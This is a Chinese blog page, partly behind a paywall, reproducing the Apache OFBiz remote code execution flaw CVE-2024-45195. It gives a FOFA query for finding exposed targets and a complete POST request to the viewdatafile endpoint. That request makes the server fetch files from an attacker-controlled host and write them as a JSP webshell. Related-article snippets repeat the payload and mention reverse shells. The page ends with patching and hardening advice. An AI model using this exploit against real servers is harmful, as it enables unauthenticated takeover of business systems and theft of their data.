Apache-OFBiz远程代码执行漏洞(CVE-2024-45195)

最新推荐文章于 2025-10-28 10:00:00 发布

原创

最新推荐文章于 2025-10-28 10:00:00 发布 · 335 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#apache #web安全 #安全威胁分析 #漏洞复现 #漏洞库

漏洞描述

Apache OFBiz 远程代码执行漏洞(CVE-2024-45195)，该漏洞允许未经身份验证的远程攻击者通过SSRF漏洞控制请求从而写入恶意文件。攻击者可能利用该漏洞来执行恶意操作，包括但不限于获取敏感信息、修改数据或执行系统命令，最终可导致服务器失陷。

fofa

app="Apache_OFBiz"

poc

POST /webtools/control/forgotPassword/viewdatafile HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Type: application/x-www-form-urlencoded
 
DATAFILE_LOCATION=http://vpsip:5000/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://vpsip:5000/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce

rcereport.csv

<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLS

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Sword-heart

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Apache OFBiz 未授权远程代码执行漏洞（CVE-2024-45195）

iSee857的博客

09-08

1388

Apache OFBiz是⼀个著名的电⼦商务平台，提供了创建基于最新 J2EE/ XML规范和技术标准，构建大中型企业级、跨平台、跨数据库、跨应⽤服务器的多层、分布式电⼦商务类WEB应⽤系统的框架。Apache OFBiz 18.12.16 之前版本中，由于Web 应用程序中缺少视图授权检查，未经身份验证的远程威胁者可构造恶意请求写入恶意文件导致远程代码执行，从而获取服务器权限。在服务器上启动一个python http服务用以请求发送。服务器上启的http服务收到访问链接。访问下列接口进行RCE验证。

Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)

0xSec

09-06

1668

2024年9月，互联网上披露了Apache OFBiz 远程代码执行漏洞(CVE-2024-45195)，该漏洞允许未经身份验证的远程攻击者通过SSRF漏洞控制请求从而写入恶意文件。攻击者可能利用该漏洞来执行恶意操作，包括但不限于获取敏感信息、修改数据或执行系统命令，最终可导致服务器失陷。

参与评论您还未登录，请先登录后发表或查看评论

【春秋云境】CVE-2024-45195 Apache OFbiz从未授权到RCE

最新发布

HMX404的博客

10-28

355

摘要：本文介绍了Apache OFBiz系统的安全漏洞利用过程，针对未完全修复的身份验证绕过问题进行攻击。作者提供了详细的攻击步骤，包括使用605字符的webshell脚本和XML配置文件，通过viewdatafile接口将恶意文件写入系统。攻击成功后可在/webapp/accounting/shell.jsp路径执行任意命令。文章还提供了免费端口映射方案（FRP/cpolar）和XML配置解析说明，特别强调了length字段需要与webshell实际字符数严格匹配以避免上传失败。

超过2.2万个已删PyPI包竟存在被“复兴劫持”风险，供应链攻击新手段曝光！微软macOS应用惊爆八大漏洞，黑客可轻松获取无限制访问权限！| 安全周报0906

weixin_55163056的博客

09-06

1990

Apache OFBiz爆新漏洞，远程代码执行威胁Linux与Windows安全;中国贸易公司遭新型跨平台恶意软件KTLVdoor猛烈攻击;Android用户务必立即安装最新安全补丁，堵截正在被黑客利用的漏洞;超过2.2万个已删PyPI包竟存在被“复兴劫持”风险

CVE-2024-45195漏洞复现并反弹shell（Apache OFBiz 未授权远程代码执行漏洞）

yyytaotao的博客

09-12

1520

本文利用了一个云服务器来远程代码执行并反弹shell.

Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)并拿到shell

weixin_67840381的博客

09-12

1448

DATAFILE_LOCATION=http://公网ip:端口/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://公网ip:端口/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce。Host: 对方的host。这次使用的nc命令为。

Goby 漏洞发布｜（CVE-2024-45195）Apache OFBiz /viewdatafile 代码执行漏洞【已复现】

m0_46699477的博客

09-10

659

CVE-2024-45195:Apache OFBiz /viewdatafile 代码执行漏洞,Apache OFBiz是一个开源企业资源规划（ERP）系统。它提供了一套企业应用程序，集成并自动化企业的许多业务流程。 Apache OFBiz 存在远程代码执行漏洞，远程攻击者可通过控制请求从而写入恶意文件获取服务器权限。

Apache OFBiz远程代码执行漏洞（CVE-2023-51467）

Keepb1ue的博客

12-28

1203

该系统的身份验证机制存在缺陷，可能允许未授权用户通过绕过标准登录流程来获取后台访问权限。此外，在处理特定数据输入时，存在漏洞可能导致不安全的代码执行，增加了系统安全性的风险。未授权访问和潜在的远程代码执行：此漏洞可能允许攻击者绕过安全限制，实现未授权访问和远程代码执行，严重时可能导致数据泄露、系统控制权被夺取。Apache官方已发布安全更新

Apache Tomcat 文件包含漏洞（CVE-2020-1938）操作指南

乐大厨串串香飘万里

08-09

1030

1.漏洞详细Tomcat是Apache软件基金会Jakarta 项目中的一个核心项目，作为目前比较流行的Web应用服务器，深受Java爱好者的喜爱，并得到了部分软件开发商的认可。Tomcat服务器是一个免费的开放源代码的Web应用服务器，被普遍使用在轻量级Web应用服务的构架中。2020年1月6日，国家信息安全漏洞共享平台（CNVD）收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞。Tomcat AJP协议由于存在实现缺陷导致相关参数可控，攻击者利用该漏洞可通过构造特定参数，读

Apache OFBiz漏洞 CVE-2023-49070 的前世今生

离别歌

12-08

1330

【漏洞复现】Apache OFBiz 授权不当致远程代码执行

今天是几号的博客

08-06

1831

攻击者可能利用该漏洞来执行恶意操作，包括但不限于获取敏感信息、修改数据或执行系统命令，最终可导致服务器失陷。Apache OFBiz 是一个开源的企业资源计划 (ERP) 和客户关系管理 (CRM) 软件平台，提供全面的企业管理解决方案，包括电子商务、库存管理、制造、会计等功能，支持企业进行灵活的定制和扩展。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。本文所涉及的任何技术、信息或工具，仅供学习和参考之用。

中间件安全—Apache常见漏洞

热门推荐

剁椒鱼头没剁椒的博客

02-20

1万+

Apache HTTPD是一款HTTP服务器，它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞，在解析PHP时，1.php\x0A将被按照PHP后缀进行解析，导致绕过一些服务器的安全策略。apache httpd支持一个文件多个后缀，windows对于多后缀的识别是看最后一个“.”之后的后缀名。apache对于多后缀文件的识别是从后往前识别，最后一个后缀不能被识别时，会往前识别。

Apache的CVE-2021-41773漏洞

网安小白

08-06

359

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下（默认开启），攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件在服务端开启了gi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执⾏任意cgi命令（RCE）

漏洞复现-Apache OFBiz 未授权远程代码执行漏洞 (CVE-2023-49070)

玄道的网安博客

08-11

785

Apache XML-RPC 是 XML-RPC 的 Java 实现，XML-RPC 是一种使用 XML over HTTP 来实现远程过程调用的协议。USERNAME=&PASSWORD=s&requirePasswordChange=Y绕过针对/control/xmlrpc的接口过滤限制（CVE-2020-9496），从而使用 Apache XMLRPC 客户端库的应用程序权限执行任意代码。所以，只要我们在发送XML-RPC请求的时候，将。这个补丁的作用是为XML-RPC的接口增加鉴权。

Apache学习笔记（详解，漏洞复现，基线检查）

qq_66934029的博客

09-29

2684

在Apache 2.4.0-2.4.29当中存在，在上述版本当中，Apache开启了正则表达式的多行属性，在匹配.php$文件时除了会匹配到的.php结尾的文件还会匹配到.php\0a结尾的文件，在业务环境中.php结尾的文件会交由PHP解释器执行，所以黑客可以上传.php\0a结尾对的文件来绕过上传限制，并且让文件中的内容按照PHP代码来执行。MaxKeepAliveRequests指令限制每个连接允许的请求数，打开KeepAlive时，如果将其设置为0，则将允许无限制的请求。默认设置一般即符合要求。

apache 远程代码执行 （CVE-2021-42013）

Cherish what you have!

11-25

793

Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点，发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护，则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本，则这可能允许远程代码执行。

Apache OfBiz 反序列化命令执行漏洞（CVE-2020-9496）漏洞

weixin_48413667的博客

09-10

1264

一、软件介绍 Apache OFBiz是一个非常著名的电子商务平台，是一个非常著名的开源项目，提供了创建基于最新J2EE/XML规范和技术标准，构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。二、漏洞描述 Apache OFBiz在17.12.04版本之前的XMLRPC接口存在一处反序列化漏洞，

Apache漏洞CVE-2020-1938漏洞复现

qq_53579360的博客

11-21

1326

CVE-2020-1938漏洞复现

CVE-2024-45195

01-17

### CVE-2024-45195 漏洞详情 CVE-2024-45195 是 Apache OFBiz 中 `/viewdatafile` 接口存在的代码执行漏洞。此漏洞允许攻击者通过精心构造的请求，在服务器端执行任意代码，从而完全控制受影响的应用程序实例[^2]。 #### 影响范围该漏洞影响所有使用 Apache OFBiz 应用框架并启用了 `/viewdatafile` 功能模块的部署环境。具体版本受影晌情况需参照官方公告确认，通常较新版本可能已经包含了对该问题的部分缓解措施。由于 Apache OFBiz 广泛应用于企业资源规划 (ERP) 和客户关系管理 (CRM)，因此潜在的影响面较大。 #### 修复方案为了防止利用此漏洞进行攻击，建议采取以下措施： 1. **立即更新至最新版**：尽快将 Apache OFBiz 升级到最新的稳定版本，因为开发者团队会在后续版本中修复此类安全问题。 2. **禁用不必要的服务接口**：如果业务逻辑不需要使用 `/viewdatafile` API，则应考虑将其关闭或限制访问权限，减少暴露风险。 3. **应用补丁**：对于无法立刻升级的情况，应当密切关注厂商发布的针对性修补程序，并及时安装以封堵漏洞。 4. **加强输入验证**：即使有其他防护手段，也应在应用程序层面强化对外部数据输入的校验机制，避免恶意参数穿透防御体系。 ```bash # 更新命令示例（实际操作前请查阅官方文档） cd /path/to/apache-ofbiz/ git pull origin main ./gradlew cleanAll build install ```